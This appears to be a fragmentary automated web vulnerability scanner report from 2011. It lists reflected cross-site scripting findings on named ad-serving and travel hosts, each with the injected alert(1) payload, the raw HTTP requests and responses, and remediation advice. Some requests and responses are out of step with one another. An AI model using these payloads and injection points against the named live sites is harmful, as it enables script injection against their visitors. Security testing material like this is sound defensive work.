GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-572cbe"-alert(1)-"0d58657472&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1 Host: fw.adsafeprotected.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.politico.com/
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=65F5E597A488065BF0B9A3F95C11853B; Path=/ Content-Type: text/javascript Date: Tue, 01 Nov 2011 01:31:58 GMT Connection: close
The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca2cc'-alert(1)-'ca99a4bfd79 was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Tue, 01 Nov 2011 01:29:45 GMT Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2 Vary: Accept-Encoding P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Connection: close Content-Type: text/html Content-Length: 513
The value of the ran request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0a58'-alert(1)-'37205a44657 was submitted in the ran parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Tue, 01 Nov 2011 01:29:31 GMT Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2 Vary: Accept-Encoding P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Cache-Control: no-store, no-cache, private Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 513
The value of the auid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc65c'-alert(1)-'3cfef65f846 was submitted in the auid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb9af'-alert(1)-'8c83aaf82f3 was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Set-Cookie: OX_u=c3d1518f-d235-7c24-90da-5525c6a44dce_m; Version=1; Expires=Wed, 31 Oct 2012 02:16:05 GMT; Max-Age=31536000; Path=/ Server: MochiWeb/1.1 WebMachine/1.8.1 (participate in the frantic) Pragma: no-cache P3P: CP="CUR ADM OUR NOR STA NID" Expires: Mon, 26 Jul 1997 05:00:00 GMT Date: Tue, 01 Nov 2011 02:16:05 GMT Content-Type: text/html Content-Length: 1393 Cache-Control: private, max-age=0, no-cache Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><base target="_top" /><script type="text/javascript">setTimeout('window.location.replace("http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36824&cb=INSERT_RANDOM_NUMBER_HEREcb9af'-alert(1)-'8c83aaf82f3&rd=60&rm=25&rc=11")', 60*1000);</script> ...[SNIP]...
3.57. http://mediaservices-d.openxenterprise.com/w/1.0/afr [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mediaservices-d.openxenterprise.com
Path:
/w/1.0/afr
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dce2b'-alert(1)-'e933e1773f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the rm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b628'-alert(1)-'9b6b7bb68d4 was submitted in the rm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5e01'%3balert(1)//6c699322ab6 was submitted in the _TSM_HiddenField_ parameter. This input was echoed as c5e01';alert(1)//6c699322ab6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12df5'-alert(1)-'78a7bb69b97 was submitted in the frameName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93091'-alert(1)-'e25b469b5fe was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8323'-alert(1)-'c4592e9428f was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7266"%3balert(1)//5bb8f1d904 was submitted in the action parameter. This input was echoed as b7266";alert(1)//5bb8f1d904 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee865"%3balert(1)//09abc2650ba was submitted in the cwadformat parameter. This input was echoed as ee865";alert(1)//09abc2650ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 924a2"%3balert(1)//97f0af79fc5 was submitted in the cwheight parameter. This input was echoed as 924a2";alert(1)//97f0af79fc5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63007"%3balert(1)//20143b9261c was submitted in the cwpid parameter. This input was echoed as 63007";alert(1)//20143b9261c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67ee2"%3balert(1)//21adaaad5aa was submitted in the cwpnet parameter. This input was echoed as 67ee2";alert(1)//21adaaad5aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0e31"%3balert(1)//0f0bf0ed21 was submitted in the cwrun parameter. This input was echoed as d0e31";alert(1)//0f0bf0ed21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35868"%3balert(1)//fff8b34fa18 was submitted in the cwtagid parameter. This input was echoed as 35868";alert(1)//fff8b34fa18 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faf4b"%3balert(1)//5282da8c62b was submitted in the cwwidth parameter. This input was echoed as faf4b";alert(1)//5282da8c62b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the publisherID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc618"%3balert(1)//6afeacdf2bf was submitted in the publisherID parameter. This input was echoed as bc618";alert(1)//6afeacdf2bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the siteID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3d8e"%3balert(1)//b077b748e60 was submitted in the siteID parameter. This input was echoed as f3d8e";alert(1)//b077b748e60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cacd3"%3balert(1)//56c2717715 was submitted in the n parameter. This input was echoed as cacd3";alert(1)//56c2717715 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Tue, 01 Nov 2011 02:17:36 GMT Server: PWS/1.7.3.7 X-Px: ms h0-s1041.p10-sjc ( h0-s1029.p10-sjc), ms h0-s1029.p10-sjc ( origin>CONN) Cache-Control: max-age=7200 Expires: Tue, 01 Nov 2011 04:17:36 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 18448
var LJT_AdChoices = { img1: 'http://www.lijit.com/___lok_a16/res/images/adchoices/adChoicesSmall_icon.png', img2: 'http://www.lijit.com/___lok_a16/res/images/adchoices/adChoicesBig_icon.png', enabl ...[SNIP]... ime String', e); return "00:00:00"; } }
try{ // Settings: Change these values on a per user basis var lwp_ad_username = "phytomedia"; var lwp_ad_zoneid = ljt_getZoneID(); var lwp_ad_numads = "1cacd3";alert(1)//56c2717715"; var lwp_ad_premium = "1";// or 0 for non-premium ad var lwp_ad_eleid = "lijit_region_129604"; var lwp_method = "regex"; var lwp_referring_search = getReferringSearch(document.referrer);
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74ba8'-alert(1)-'95877a0866b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Content-Type: text/javascript Date: Tue, 01 Nov 2011 01:44:01 GMT Content-Length: 514
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9db9'-alert(1)-'15554cd81fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=ad&ad_size=300x250§ion=1921728&referrer=http://www.politico.com/index.html HTTP/1.1 Host: adserving.cpxinteractive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=f9db9'-alert(1)-'15554cd81fa
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Content-Type: text/javascript Date: Tue, 01 Nov 2011 01:43:45 GMT Content-Length: 417
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5405a"-alert(1)-"7d57fc3ef98 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1 Host: fw.adsafeprotected.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=5405a"-alert(1)-"7d57fc3ef98
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=5C6102E2F6A83F9DB553F50477F682D3; Path=/ Content-Type: text/javascript Date: Tue, 01 Nov 2011 01:32:00 GMT Connection: close
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 9bdd6<script>alert(1)</script>f18eed8b017 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.kayak.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=9bdd6<script>alert(1)</script>f18eed8b017
The value of the AA002 cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aee9c"><a>587f12fdd92 was submitted in the AA002 cookie. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.